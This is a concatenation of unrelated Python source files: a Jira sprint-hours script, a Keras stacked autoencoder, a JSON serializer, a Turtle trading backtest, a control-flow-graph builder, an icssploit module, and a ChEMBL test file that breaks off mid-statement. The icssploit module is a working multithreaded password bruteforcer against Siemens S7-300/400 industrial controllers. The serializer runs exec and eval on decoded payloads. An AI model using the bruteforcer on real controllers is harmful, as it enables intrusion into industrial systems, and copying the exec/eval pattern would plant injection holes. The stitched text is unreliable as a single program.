total_work = sum([issue['logged'] for issue in issues_without_refinements])
print('Total hours logged: {}'.format(total_work))
# "Minor work": time logged on issues owned by someone else.
minor_work = sum([issue['logged'] for issue in issues_without_refinements if not issue['owner']])
print('Minor work: {}'.format(minor_work))
owned_issues = [issue for issue in issues_without_refinements if issue['owner'] and not issue['other_sprint']]
other_sprint = [issue for issue in issues_without_refinements if issue['owner'] and issue['other_sprint']]
total_logged = sum([issue['logged'] for issue in owned_issues])
total_estimation = sum([issue['estimation'] for issue in owned_issues])
# Burnout = hours logged over (positive) or under (negative) the estimation.
total_burnout = total_logged - total_estimation
# NOTE(review): divides by zero when no owned issue carries an estimation.
total_burnout_percent = total_burnout / total_estimation * 100
print('Other sprint')
for issue in other_sprint:
    burnout = issue['logged'] - issue['estimation'] if issue['estimation'] > 0 else 0
    burnout_percent = burnout / issue['estimation'] * 100 if issue['estimation'] > 0 else 0
    print('{} {} estimated {} logged {} burnout {} = {}%'.format(issue['key'], issue['summary'], int(issue['estimation']), int(issue['logged']), int(burnout), int(burnout_percent)))
print('Owned issued')
for issue in owned_issues:
    burnout = issue['logged'] - issue['estimation'] if issue['estimation'] > 0 else 0
    burnout_percent = burnout / issue['estimation'] * 100 if issue['estimation'] > 0 else 0
    print('{} {} {} estimated {} logged {} burnout {} = {}%'.format(issue['key'], issue['status'], issue['summary'], int(issue['estimation']), int(issue['logged']), int(burnout), int(burnout_percent)))
print('Total: estimated {} logged {} burnout {} = {}%'.format(int(total_estimation), int(total_logged), int(total_burnout), int(total_burnout_percent)))
|
"""
Builds a stacked autoencoder.
Author(s): <NAME> (<EMAIL>)
"""
import numpy as np
from keras.models import Sequential
from keras.optimizers import Adagrad, SGD, Adadelta, Adam
from keras.regularizers import l2
from keras.layers import Input, Dense, noise
from keras.models import Model
from keras import backend as K
#from early_stopping import MyEarlyStopping
import ConfigParser
def save_decoder(model, ae_id, c):
    """Persist a decoder's architecture (JSON) and weights (HDF5).

    The file name encodes the data source, noise scale, autoencoder id
    and the cluster/run index c, all read from config.ini.
    """
    cfg = ConfigParser.ConfigParser()
    cfg.read('config.ini')
    source = cfg.get('Global', 'source')
    noise_scale = cfg.getfloat('Global', 'noise_scale')
    if source == 'sf':
        alpha = cfg.getfloat('Superformula', 'nonlinearity')
        beta = cfg.getint('Superformula', 'n_clusters')
        sname = '-'.join([source, str(beta), str(alpha)])
    elif source == 'glass' or source[:3] == 'sf-':
        sname = source
    fname = '%s_%.4f_%s_%d' % (sname, noise_scale, ae_id, c)
    # Architecture goes next to the trained models, weights under decoders/.
    with open('./trained_models/' + fname + '_architecture.json', 'w') as arch_file:
        arch_file.write(model.to_json())
    model.save_weights('./decoders/' + fname + '_weights.h5', overwrite=True)
def train_ae(data, feature_dim, hidden_sizes, l, p=0, batch_size=100, activation='tanh',
             activity_regularizer=None, weights=None, nb_epoch=1000, loss='mse', verbose=False):
    """Train a single (optionally denoising) autoencoder on `data`.

    data         : 2-D array, samples x input dimension
    feature_dim  : size of the innermost (feature) layer
    hidden_sizes : sizes of intermediate encoder layers
    l            : L2 weight-regularization factor
    p            : GaussianDropout rate (denoising when > 0)
    weights      : optional initial weights (e.g. from greedy pre-training)

    Returns (a, W_en, W_de, model): hidden-layer activations for `data`,
    the encoder/decoder weights for a 1-layer model (None when deeper),
    and the trained model.

    NOTE: written against the Keras 1.x API (Model(input=..., output=...),
    W_regularizer, nb_epoch).
    """
    data_dim = data.shape[1]
    inputs = Input(shape=(data_dim,))
    sizes = [data_dim] + hidden_sizes + [feature_dim]
    n_layers = len(sizes) - 1
    # Encoder
    x = noise.GaussianDropout(p)(inputs)
    for i in range(n_layers):
        x = Dense(sizes[i+1], activation=activation, W_regularizer=l2(l))(x)
    # Decoder (mirror image of the encoder)
    for i in range(n_layers):
        x = Dense(sizes[-i-2], activation=activation, W_regularizer=l2(l))(x)
    decoded = x
    model = Model(input=inputs, output=decoded)
    if weights is not None:
        model.set_weights(weights)
    # optimizer = Adagrad(lr=lr, epsilon=epsilon)
    optimizer = Adam()
    model.compile(loss=loss, optimizer=optimizer)
    # early_stopping = MyEarlyStopping(monitor='loss', patience=10, verbose=verbose, tol=1e-6)
    model.fit(data, data, batch_size=batch_size, nb_epoch=nb_epoch, verbose=verbose)#, callbacks=[early_stopping])
    if n_layers == 1:
        # Single-layer case: expose the weights for greedy layer-wise use.
        W_en = model.layers[-2].get_weights()
        W_de = model.layers[-1].get_weights()
    else:
        W_en = None
        W_de = None
    # Hidden-layer activations in test phase (learning_phase = 0).
    encode = K.function([model.layers[0].input, K.learning_phase()], [model.layers[-2].output])
    a = encode([data, 0])[0] # hidden layer's activation
    return a, W_en, W_de, model
def sae(data, c, feature_dim, train, test, hidden_size_l1=0, hidden_size_l2=0, hidden_size_l3=0, hidden_size_l4=0, p=0.3,
        l=0, batch_size=100, evaluation=False, overwrite=True):
    ''' Select number of layers for autoencoder based on arguments
    hidden_size_l1, hidden_size_l2, hidden_size_l3 and hidden_size_l4

    Trains a stacked (denoising when p > 0) autoencoder on data[train],
    optionally returns the reconstruction cost on data[test] (when
    evaluation=True, for hyperparameter search), otherwise returns
    (features, name, decoder.predict). '''
    np.random.seed(0)
    pre_training = False
    verbose = 0
    activation = 'tanh'
    loss = 'mse'
    nb_epoch = 5000 # maximum number of epochs
    # p = 0.1 # dropout fraction for denoising autoencoders
    # The first zero-valued hidden size truncates the layer stack.
    if hidden_size_l1 == 0:
        hidden_sizes = []
    elif hidden_size_l2 == 0:
        hidden_sizes = [hidden_size_l1]
    elif hidden_size_l3 == 0:
        hidden_sizes = [hidden_size_l1, hidden_size_l2]
    elif hidden_size_l4 == 0:
        hidden_sizes = [hidden_size_l1, hidden_size_l2, hidden_size_l3]
    else:
        hidden_sizes = [hidden_size_l1, hidden_size_l2, hidden_size_l3, hidden_size_l4]
    data_dim = data.shape[1]
    sizes = [data_dim] + hidden_sizes + [feature_dim]
    n_layers = len(sizes) - 1
    Ws = None
    # Pre-training (greedy layer-wise training)
    if pre_training:
        Ws_en = []
        Ws_de = []
        a = data[train]
        for i in range(n_layers):
            if verbose:
                print 'Pre-training for Layer %d ...' % (i+1)
            a, W_en, W_de, _ = train_ae(a, sizes[i+1], [], l, p=p, batch_size=batch_size,
                                        nb_epoch=nb_epoch, loss=loss, verbose=verbose)
            Ws_en.append(W_en)
            Ws_de.append(W_de)
        # Decoder weights are stacked in reverse to mirror the encoder.
        Ws_de.reverse()
        Ws = Ws_en + Ws_de
        Ws = [item for sublist in Ws for item in sublist]
    # Fine tuning
    if verbose:
        print 'Fine tuning ...'
    _, _, _, model = train_ae(data[train], feature_dim, hidden_sizes, l, p=p, batch_size=batch_size,
                              nb_epoch=nb_epoch, loss=loss, verbose=verbose, weights=Ws)
    if evaluation:
        # Used for hyperparameter optimization
        cost = model.evaluate(data[test], data[test], batch_size=len(test), verbose=verbose)
        return cost
    # Reconstruct using the decoder
    decoder = Sequential()
    for i in range(n_layers):
        decoder.add(Dense(sizes[-i-2], input_dim=sizes[-i-1], activation=activation,
                          weights=model.layers[-n_layers+i].get_weights()))
    decoder.compile(loss='mse', optimizer='sgd')
    if p > 0:
        name = 'SDAE-'+str(n_layers)
    else:
        name = 'SAE-'+str(n_layers)
    if overwrite:
        # Save the decoder
        save_decoder(decoder, name, c)
    # Feature extraction: innermost encoder layer's output in test phase.
    encode = K.function([model.layers[0].input, K.learning_phase()], [model.layers[-n_layers-1].output])
    features = np.zeros((data.shape[0],feature_dim))
    features[train+test] = encode([data[train+test], 0])[0]
    return features, name, decoder.predict
|
<filename>zvdata/sedes.py
# -*- coding: utf-8 -*-
import inspect
import json
from enum import Enum
import dash_core_components as dcc
import dash_daq as daq
import dash_html_components as html
import pandas as pd
import simplejson
from dash.dependencies import State
from sqlalchemy.ext.declarative import DeclarativeMeta
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.sql.elements import BinaryExpression
from zvdata.domain import context, table_name_to_domain_name
from zvdata.structs import IntervalLevel
from zvdata.utils.time_utils import to_time_str
class CustomJsonEncoder(json.JSONEncoder):
    """JSON encoder that serializes SQLAlchemy BinaryExpression filters as a
    tagged dict ({'_type': 'filter', 'data': <filter string>}) which
    CustomJsonDecoder can later turn back into a live expression."""

    def default(self, obj):
        if isinstance(obj, BinaryExpression):
            # str(obj) renders e.g. 'table.col = :col_1'; split into the
            # left operand, the operator, and the (ignored) bind token.
            # NOTE(review): assumes the rendered SQL is exactly three
            # whitespace-separated tokens — confirm for all filters used.
            sql_str = str(obj)
            left, expression, _ = sql_str.split()
            table_name, col = left.split('.')
            # The concrete comparison value lives on the right bind parameter.
            value = obj.right.value
            domain_name = table_name_to_domain_name(table_name)
            if expression == '=':
                expression = '=='
            # NOTE(review): exec() of a constructed import — safe only while
            # table/domain names never come from untrusted input.
            exec(f'from {context["domain_module"]} import {domain_name}')
            if isinstance(value, str):
                filter_str = '{}.{} {} "{}"'.format(domain_name, col, expression, value)
            else:
                filter_str = '{}.{} {} {}'.format(domain_name, col, expression, value)
            return {'_type': 'filter',
                    'data': filter_str}
        return super().default(obj)
class CustomJsonDecoder(json.JSONDecoder):
    """JSON decoder that rebuilds SQLAlchemy filter expressions from the
    tagged dicts produced by CustomJsonEncoder."""

    def __init__(self, *args, **kwargs):
        json.JSONDecoder.__init__(self, object_hook=self.object_hook, *args, **kwargs)

    def object_hook(self, obj):
        # Pass plain objects through untouched.
        if '_type' not in obj:
            return obj
        _type = obj.get('_type')
        data = obj.get('data')
        if _type == 'filter':
            # The payload is e.g. 'Stock1dKdata.close > 1.0'.
            filter_str = data
            left, _, _ = filter_str.split()
            domain_name, col = left.split('.')
            # NOTE(review): exec/eval of serialized payloads — only safe for
            # trusted, self-produced JSON; never feed user input through this.
            exec(f'from {context["domain_module"]} import {domain_name}')
            return eval(filter_str)
        return obj
class Jsonable(object):
    """Mixin that serializes an object based on its constructor arguments.

    ``__json__`` inspects the class constructor signature and, for each
    argument name, reads the same-named attribute off the instance,
    converting common non-JSON types (pandas timestamps, SQLAlchemy
    entities and columns, enums) to JSON-friendly values.
    """

    def id(self):
        # Identity derived from the JSON form: equal payloads hash alike.
        return hash(simplejson.dumps(self.__json__()))

    def __json__(self):
        result = {}
        spec = inspect.getfullargspec(self.__class__)
        args = [arg for arg in spec.args if arg != 'self']
        for arg in args:
            # Read the attribute directly; the previous eval()-based lookup
            # was equivalent but needlessly unsafe and slower.
            value = getattr(self, arg)
            json_value = value
            if isinstance(value, pd.Timestamp):
                json_value = to_time_str(value)
            if isinstance(value.__class__, DeclarativeMeta):
                # SQLAlchemy model instance -> its class name.
                json_value = value.__class__.__name__
            if isinstance(value, InstrumentedAttribute):
                # SQLAlchemy column attribute -> its column name.
                json_value = value.name
            if isinstance(value, Enum):
                json_value = value.value
            result[arg] = json_value
        return result

    for_json = __json__  # supported by simplejson
class UiComposable(object):
    """Mixin that builds dash UI inputs/states from the class constructor
    signature and converts submitted values back into argument lists."""

    @classmethod
    def to_html_inputs(cls):
        """
        construct ui input from the class constructor arguments spec

        Returns (divs, states): one labelled widget per constructor
        argument and the matching dash State for callbacks.
        """
        spec = inspect.getfullargspec(cls)
        args = [arg for arg in spec.args if arg != 'self']
        annotations = spec.annotations
        # NOTE(review): assumes every constructor arg has a default —
        # args and defaults are indexed in lockstep below.
        defaults = [cls.marshal_data_for_ui(default) for default in spec.defaults]
        divs = []
        states = []
        for i, arg in enumerate(args):
            left = html.Label(arg, style={'display': 'inline-block', 'width': '100px'})
            annotation = annotations.get(arg)
            default = defaults[i]
            if annotation is bool:
                right = daq.BooleanSwitch(id=arg, on=default)
                state = State(arg, 'value')
            elif 'level' == arg:
                right = dcc.Dropdown(id=arg,
                                     options=[{'label': item.value, 'value': item.value} for item in IntervalLevel],
                                     value=default)
                state = State(arg, 'value')
            elif 'timestamp' in arg:
                right = dcc.DatePickerSingle(id=arg, date=default)
                state = State(arg, 'date')
            else:
                if 'filters' == arg and default:
                    # BUG FIX: json.dumps takes a JSONEncoder subclass via
                    # cls; the decoder was passed here by mistake and would
                    # raise at serialization time.
                    default = json.dumps(default, cls=CustomJsonEncoder)
                if 'columns' == arg and default:
                    columns = [column.name for column in default]
                    default = ','.join(columns)
                if isinstance(default, list) or isinstance(default, dict):
                    default = json.dumps(default)
                right = dcc.Input(id=arg, type='text', value=default)
                state = State(arg, 'value')
            right.style = {'display': 'inline-block'}
            divs.append(html.Div([left, right], style={'margin-left': '120px'}))
            states.append(state)
        return divs, states

    @classmethod
    def ui_meta(cls):
        """Optional per-class UI metadata; subclasses may override."""
        return {}

    @classmethod
    def marshal_data_for_ui(cls, data):
        """Convert a default value into a UI-displayable primitive."""
        if isinstance(data, Enum):
            return data.value
        if isinstance(data, pd.Timestamp):
            return to_time_str(data)
        return data

    @classmethod
    def unmarshal_data_for_arg(cls, data):
        """Convert a UI value back into a constructor argument (identity here)."""
        return data

    @classmethod
    def from_html_inputs(cls, *inputs):
        """Map raw UI input strings back to constructor argument values."""
        arg_values = []
        spec = inspect.getfullargspec(cls)
        args = [arg for arg in spec.args if arg != 'self']
        annotations = spec.annotations
        for i, raw_value in enumerate(inputs):
            result = raw_value
            arg = args[i]  # kept: raises if more inputs than constructor args
            if raw_value:
                try:
                    result = json.loads(raw_value, cls=CustomJsonDecoder)
                except Exception:
                    # Best effort: non-JSON values are passed through as-is.
                    pass
            arg_values.append(result)
        return arg_values
|
import numpy as np
import talib
import math
def get_extreme(array_high_price_result, array_low_price_result):
    """Highest high and lowest low over the window, excluding the last bar.

    Returns [max_high, min_low].
    """
    highs = np.asarray(array_high_price_result)[:-1]
    lows = np.asarray(array_low_price_result)[:-1]
    return [highs.max(), lows.min()]
def get_atr_and_unit(atr_array_result, atr_length_result, portfolio_value_result):
    """Latest ATR and the Turtle position unit (1% of equity per ATR).

    Returns [atr, unit].
    """
    latest_atr = atr_array_result[atr_length_result - 1]
    position_unit = math.floor(portfolio_value_result * .01 / latest_atr)
    return [latest_atr, position_unit]
def get_stop_price(first_open_price_result, units_hold_result, atr_result):
    """Turtle stop: 2*ATR below the first entry, raised 0.5*ATR per added unit."""
    raised = (units_hold_result - 1) * 0.5 * atr_result
    return first_open_price_result - 2 * atr_result + raised
def init(context):
    """Initialise Turtle-strategy state on the rqalpha strategy context."""
    defaults = {
        'trade_day_num': 0,            # bars elapsed, for the 5-day unit refresh
        'unit': 0,                     # position size per entry (shares)
        'atr': 0,
        'trading_signal': 'start',
        'pre_trading_signal': '',
        'units_hold_max': 4,           # cap on pyramid adds
        'units_hold': 0,
        'quantity': 0,
        'max_add': 0,                  # price threshold for the next add
        'first_open_price': 0,
        's': '000300.XSHG',            # traded instrument: CSI 300 index
        'open_observe_time': 55,       # Donchian entry lookback
        'close_observe_time': 20,      # Donchian exit lookback
        'atr_time': 20,                # ATR period
    }
    for attr, value in defaults.items():
        setattr(context, attr, value)
def handle_bar(context, bar_dict):
    """Per-bar Turtle logic: Donchian entries, pyramiding, ATR stops, exits.

    Relies on the rqalpha runtime for history_bars/order_shares and the
    context/bar_dict objects.
    """
    portfolio_value = context.portfolio.portfolio_value
    high_price = history_bars(context.s, context.open_observe_time + 1, '1d', 'high')
    low_price_for_atr = history_bars(context.s, context.open_observe_time + 1, '1d', 'low')
    low_price_for_extreme = history_bars(context.s, context.close_observe_time + 1, '1d', 'low')
    close_price = history_bars(context.s, context.open_observe_time+2, '1d', 'close')
    close_price_for_atr = close_price[:-1]
    atr_array = talib.ATR(high_price, low_price_for_atr, close_price_for_atr, timeperiod=context.atr_time)
    # 55-day high for entries, 20-day low for exits (last bar excluded).
    maxx = get_extreme(high_price, low_price_for_extreme)[0]
    minn = get_extreme(high_price, low_price_for_extreme)[1]
    atr = atr_array[-2]
    if context.trading_signal != 'start':
        if context.units_hold != 0:
            # Raise the add-on threshold by 0.5 ATR for each bar while holding.
            context.max_add += 0.5 * get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[0]
    else:
        # First bar: seed the add-on threshold with the current price.
        context.max_add = bar_dict[context.s].last
    cur_position = context.portfolio.positions[context.s].quantity
    available_cash = context.portfolio.cash
    market_value = context.portfolio.market_value
    # Signal resolution, highest priority first: stop, exit, add, entry.
    if (cur_position > 0 and
            bar_dict[context.s].last < get_stop_price(context.first_open_price, context.units_hold, atr)):
        context.trading_signal = 'stop'
    else:
        if cur_position > 0 and bar_dict[context.s].last < minn:
            context.trading_signal = 'exit'
        else:
            if (bar_dict[context.s].last > context.max_add and context.units_hold != 0 and
                    context.units_hold < context.units_hold_max and
                    available_cash > bar_dict[context.s].last*context.unit):
                context.trading_signal = 'entry_add'
            else:
                if bar_dict[context.s].last > maxx and context.units_hold == 0:
                    context.max_add = bar_dict[context.s].last
                    context.trading_signal = 'entry'
    atr = get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[0]
    # Re-size the position unit every 5 trading days.
    if context.trade_day_num % 5 == 0:
        context.unit = get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[1]
    context.trade_day_num += 1
    context.quantity = context.unit
    if (context.trading_signal != context.pre_trading_signal or
            (context.units_hold < context.units_hold_max and context.units_hold > 1) or
            context.trading_signal == 'stop'):
        if context.trading_signal == 'entry':
            context.quantity = context.unit
            if available_cash > bar_dict[context.s].last*context.quantity:
                order_shares(context.s, context.quantity)
                context.first_open_price = bar_dict[context.s].last
                context.units_hold = 1
        if context.trading_signal == 'entry_add':
            context.quantity = context.unit
            order_shares(context.s, context.quantity)
            context.units_hold += 1
        if context.trading_signal == 'stop':
            # Stops unwind one unit per bar, not the whole position.
            if context.units_hold > 0:
                order_shares(context.s, -context.quantity)
                context.units_hold -= 1
        if context.trading_signal == 'exit':
            if cur_position > 0:
                order_shares(context.s, -cur_position)
                context.units_hold = 0
    context.pre_trading_signal = context.trading_signal
# rqalpha backtest configuration: daily bars on the CSI 300 index,
# 2008-07-01 to 2014-09-01, 1M starting cash.
__config__ = {
    "base": {
        "securities": "stock",
        "start_date": "2008-07-01",
        "end_date": "2014-09-01",
        "frequency": "1d",
        "matching_type": "current_bar",
        "stock_starting_cash": 1000000,
        "benchmark": "000300.XSHG",
    },
    "extra": {
        "log_level": "error",
    },
    "mod": {
        "sys_progress": {
            "enabled": True,
            "show": True,
        },
        "sys_simulation": {
            "signal": True,
        }
    },
}
|
import os
import enum
import logging
import graphviz
import sd3.cfa.graph
from sd3.disasm.attributes import Attr as CpuAttr
class EdgeAttr(enum.Enum):
    """Marks a CFG edge as the taken / not-taken side of a conditional branch."""
    true_cond = enum.auto()   # value 1, branch taken
    false_cond = enum.auto()  # value 2, fall-through
class NodeData:
    """Payload of a CFG node: a basic block's start address and instructions."""

    def __init__(self, addr):
        self._start_addr = addr
        self._instructions = []

    def get_name(self):
        """Zero-padded hex start address, used as the node's display name."""
        return "%06X" % self._start_addr

    def display(self):
        """Print each instruction of the block on its own line."""
        for instruction in self._instructions:
            print(instruction)

    def add_instruction(self, inst):
        self._instructions.append(inst)

    def get_instructions(self):
        return self._instructions

    def has_instruction(self, addr):
        """True when an instruction at `addr` belongs to this block."""
        return any(inst.addr == addr for inst in self._instructions)
class _GraphBuilder:
    """Builds a control-flow graph (basic blocks + edges) for one routine.

    Walks the routine's instructions in order, starting a new block at
    every branch target (label) and ending the current one at every branch.
    """

    def __init__(self, routine):
        self.routine = routine
        self.cfg = None          # graph under construction
        self.curr_block = None   # block currently receiving instructions

    def _add_node(self, addr):
        # Node keys are the hex address; attach NodeData on first creation.
        (node, new_node) = self.cfg.add_node("%X" % addr)
        if new_node:
            node.set_data(NodeData(addr))
        return node

    def _find_labels(self):
        """Collect every branch-target address of the routine."""
        labels = set()
        for instr in self.routine.instructions:
            if instr.has_attr(CpuAttr.branch):
                target = instr.get_jump_target()
                labels.add(target)
        return labels

    def _handle_branch(self, instr):
        """Terminate the current block at a branch and wire its out-edges."""
        logging.debug("Found branch 0x%06X", instr.addr)
        # Block ends
        data = self.curr_block.get_data()
        data.add_instruction(instr)
        # Get the following block if exists
        if not instr.has_attr(CpuAttr.unconditional):
            next_instr_addr = instr.get_next_instr_addr()
            false_block = self._add_node(next_instr_addr)
        else:
            false_block = None
        # Get targeted block
        true_addr = instr.get_jump_target()
        logging.debug("Target: %X", true_addr)
        true_block = self._add_node(true_addr)
        # Store output edges into current block
        if false_block is not None:
            edge = self.curr_block.add_successor(false_block)
            edge.add_attr(EdgeAttr.false_cond)
            edge = self.curr_block.add_successor(true_block)
            edge.add_attr(EdgeAttr.true_cond)
            # Continue to visit the routine
            self.curr_block = false_block
        else:
            # Unconditional jump: single untagged edge, no fall-through.
            self.curr_block.add_successor(true_block)
            self.curr_block = None

    def _handle_label(self, instr):
        """Start a new block at a branch target, linking the fall-through."""
        logging.debug("Found label 0x%06X", instr.addr)
        prev_block = self.curr_block
        # Block starts
        self.curr_block = self._add_node(instr.addr)
        data = self.curr_block.get_data()
        data.add_instruction(instr)
        # Create link with previous block if we are transitioning
        # between blocks
        if prev_block is not None and prev_block != self.curr_block:
            prev_block.add_successor(self.curr_block)

    def _handle_body(self, instr):
        # Plain instruction: append to the current block.  After an
        # unconditional branch curr_block is None and is recovered by address.
        # NOTE(review): other lookups key nodes by "%X" % addr — confirm
        # cfg.get_node accepts a raw address here.
        if self.curr_block is None:
            self.curr_block = self.cfg.get_node(instr.addr)
        data = self.curr_block.get_data()
        data.add_instruction(instr)

    def _set_exit_node(self):
        """Mark the unique successor-less node (or the entry itself) as exit."""
        entry_node = self.cfg.get_entry()
        exit_node = None
        for (_, node) in self.cfg.get_node_it():
            successors_count = len(node.get_successors())
            if successors_count == 0 and node is not entry_node:
                if exit_node is not None:
                    raise Exception("Exit node already found")
                exit_node = node
        if exit_node is None:
            exit_node = entry_node
        self.cfg.set_exit(exit_node)

    def run(self):
        """Build and return the control-flow graph of the routine."""
        self.cfg = sd3.cfa.graph.Graph()
        # Add entry block
        entry_addr = self.routine.get_addr()
        self.curr_block = self._add_node(entry_addr)
        self.curr_block.set_data(NodeData(entry_addr))
        self.cfg.set_entry(self.curr_block)
        labels = self._find_labels()
        for instr in self.routine.instructions:
            if instr.has_attr(CpuAttr.branch):
                self._handle_branch(instr)
            elif instr.addr in labels:
                self._handle_label(instr)
            else:
                self._handle_body(instr)
        # Set exit node
        self._set_exit_node()
        return self.cfg
class _GraphDrawer:
    """Renders a CFG to an image file via graphviz."""

    @staticmethod
    def _node_to_str(node):
        # One instruction per line; "\l" is graphviz's left-justified newline.
        node_str = ""
        data = node.get_data()
        for instr in data.get_instructions():
            node_str += "%s\l" % instr.to_str(display_addr=False)
        return node_str

    @staticmethod
    def _build_edge_attrs(edge):
        """Green 'true' / red 'false' styling for conditional edges."""
        attrs = {}
        if edge.has_attr(EdgeAttr.true_cond):
            color = "green"
            attrs["color"] = color
            attrs["label"] = "true"
            attrs["fontcolor"] = color
        elif edge.has_attr(EdgeAttr.false_cond):
            color = "red"
            attrs["color"] = color
            attrs["label"] = "false"
            attrs["fontcolor"] = color
        return attrs

    @staticmethod
    def draw(cfg, out_path):
        """Render `cfg` to `out_path`; the file extension picks the format."""
        basename, extension = os.path.splitext(out_path)
        # Build graph
        dot = graphviz.Digraph(
            format=extension[1:],
            node_attr={"shape": "box"})
        # Build nodes
        for _, node in cfg.get_node_it():
            node_str = _GraphDrawer._node_to_str(node)
            dot.node(node.get_data().get_name(), node_str)
        # Build edges
        for edge in cfg.get_edges_it():
            attrs = _GraphDrawer._build_edge_attrs(edge)
            dot.edge(
                edge.get_src().get_data().get_name(),
                edge.get_dest().get_data().get_name(),
                **attrs)
        return dot.render(filename=basename, cleanup=True)
def build_graph(routine):
    """Build and return the control-flow graph of `routine`."""
    return _GraphBuilder(routine).run()
def draw_graph(cfg, out_path):
    """Render `cfg` with graphviz; returns the path of the rendered file."""
    return _GraphDrawer.draw(cfg, out_path)
|
from icssploit.clients.s7_client import S7Client
from scapy.all import conf
import threading
from icssploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
boolify,
multi,
validators
)
class Exploit(exploits.Exploit):
    """Bruteforces the protection password of Siemens S7-300/400 PLCs."""

    __info__ = {
        'name': 'S7 300/400 PLC Password Bruteforce',
        'description': 'Module performs bruteforce attack against S7 300/400 Device. '
                       'If valid password string is found, it is displayed to the user.',
        'authors': [
            '<NAME> <jtrkid[at]gmail.com>',
        ],
        'references': [
            '',
        ],
        'devices': [
            'Siemens S7-300 and S7-400 programmable logic controllers (PLCs)',
        ],
    }

    # Module options exposed to the icssploit console.
    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)
    port = exploits.Option(102, 'Target Port', validators=validators.integer)
    rack = exploits.Option(0, 'CPU rack number.', validators=validators.integer)
    slot = exploits.Option(2, 'CPU slot number.', validators=validators.integer)
    password = exploits.Option(wordlists.passwords, 'password string or file with community strings (file://)')
    threads = exploits.Option(3, 'Number of threads')
    verbose = exploits.Option(0, 'Verbose scapy output. 1: display, 0: hide', validators=validators.choice([0, 1]))
    stop_on_success = exploits.Option('yes', 'Stop on first valid community string')
    strings = []  # (target, port, password) tuples of successful logins

    def run(self):
        """Console entry point: reset results and launch the attack."""
        conf.verb = int(self.verbose)
        self.strings = []
        self.attack()

    @multi
    def attack(self):
        """Fan candidate passwords out to worker threads and report results."""
        # todo: check if service is up
        # NOTE(review): a file:// wordlist handle is never closed explicitly.
        if self.password.startswith('file://'):
            s7_pass = open(self.password[7:], 'r')
        else:
            s7_pass = [self.password]
        collection = LockedIterator(s7_pass)
        self.run_threads(self.threads, self.target_function, collection)
        if len(self.strings):
            print_success("Credentials found!")
            headers = ("Target", "Port", "password")
            print_table(headers, *self.strings)
        else:
            print_error("Valid password not found")

    def target_function(self, running, data):
        """Worker thread: try candidate passwords until exhausted or stopped.

        `running` is the shared stop event; `data` the locked iterator of
        candidate password strings.
        """
        module_verbosity = boolify(self.verbose)
        name = threading.current_thread().name
        print_status(name, 'thread is starting...', verbose=module_verbosity)
        s7_client = S7Client(name="Siemens PLC", ip=self.target, rack=self.rack, slot=self.slot)
        s7_client.connect()
        if not module_verbosity:
            s7_client.logger.setLevel(50)
        while running.is_set():
            try:
                string = data.next().strip()
                # S7 passwords are at most 8 characters; skip longer candidates.
                if len(string) > 8:
                    continue
                s7_client.check_privilege()
                if s7_client.protect_level == 1:
                    # Protection level 1 means no password is configured.
                    print_error("Target didn't set password.")
                    return
                s7_client.auth(string)
                if s7_client.authorized:
                    if boolify(self.stop_on_success):
                        running.clear()
                    print_success("Target: {}:{} {}: Valid password string found - String: '{}'".format(
                        self.target, self.port, name, string), verbose=module_verbosity)
                    self.strings.append((self.target, self.port, string))
                else:
                    # NOTE(review): message says "community string" (apparently
                    # copied from an SNMP module) though this checks a password.
                    print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(
                        self.target, self.port, name, string), verbose=module_verbosity)
            except StopIteration:
                break
        print_status(name, 'thread is terminated.', verbose=module_verbosity)
|
<reponame>dmyersturnbull/chembler<filename>tests/model/test_targets_real_data.py<gh_stars>0
from typing import Mapping
import pytest
from mandos.entry.api_singletons import Apis
from mandos.model.apis.chembl_support.chembl_target_graphs import (
ChemblTargetGraphFactory,
TargetEdgeReqs,
TargetNode,
TargetRelType,
)
from mandos.model.apis.chembl_support.chembl_targets import TargetFactory, TargetType
# Module-level factories so every test shares one ChEMBL API client.
factory = TargetFactory(Apis.Chembl)
graph_factory = ChemblTargetGraphFactory.create(Apis.Chembl, factory)
class TestTargets:
    """Integration tests of ChEMBL target-graph traversal (hit the live API)."""

    def test_traverse_gabaa_up(self):
        """Upward subset_of traversal from a GABA-A complex reaches its group."""
        target = factory.find("CHEMBL2109243")
        assert target.chembl == "CHEMBL2109243"
        link_types = TargetEdgeReqs.cross(
            TargetType.protein_types(),
            {TargetRelType.subset_of},
            TargetType.protein_types(),
        )
        accepted = graph_factory.at_target(target).traverse(link_types)
        assert {t.target.chembl for t in accepted} == {"CHEMBL2109243", "CHEMBL2093872"}

    def test_traverse_gabaa_up_mouse(self):
        """Traversal from a single mouse protein; one complex is a dead end."""
        # a single protein
        # branches to GABA A channel complex group CHEMBL2094133
        # but also to complexes CHEMBL4296058 and CHEMBL4296059
        # weirdly, CHEMBL4296058 then joins up with CHEMBL2094133
        # but CHEMBL4296059 does not (it only joins through an OVERLAPS WITH rel)
        # so that one SHOULD be an "end" (which wouldn't be true in a real traversal strategy, hopefully)
        target = factory.find("CHEMBL3139")
        assert target.chembl == "CHEMBL3139"
        link_types = TargetEdgeReqs.cross(
            TargetType.protein_types(),
            {TargetRelType.subset_of},
            TargetType.protein_types(),
        )
        accepted = graph_factory.at_target(target).traverse(link_types)
        vals: Mapping[str, TargetNode] = {a.target.chembl: a for a in accepted}
        assert {t.target.chembl for t in accepted} == {
            "CHEMBL2094133",
            "CHEMBL3139",
            "CHEMBL4296058",
            "CHEMBL4296059",
        }
        assert not vals["CHEMBL3139"].is_end
        assert vals["CHEMBL2094133"].is_end
        assert not vals["CHEMBL4296058"].is_end
        assert vals["CHEMBL4296059"].is_end
        assert vals["CHEMBL3139"].depth == 0
        assert vals["CHEMBL2094133"].depth == 1 # breadth-first!
        assert vals["CHEMBL2094133"].depth == 1
        assert vals["CHEMBL4296058"].depth == 1
        assert vals["CHEMBL3139"].link_reqs is None
        assert vals["CHEMBL2094133"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
            TargetRelType.subset_of,
            TargetType.protein_complex_group,
            None,
        )
        assert vals["CHEMBL4296058"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
            TargetRelType.subset_of,
            TargetType.protein_complex,
            None,
        )
        assert vals["CHEMBL4296059"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
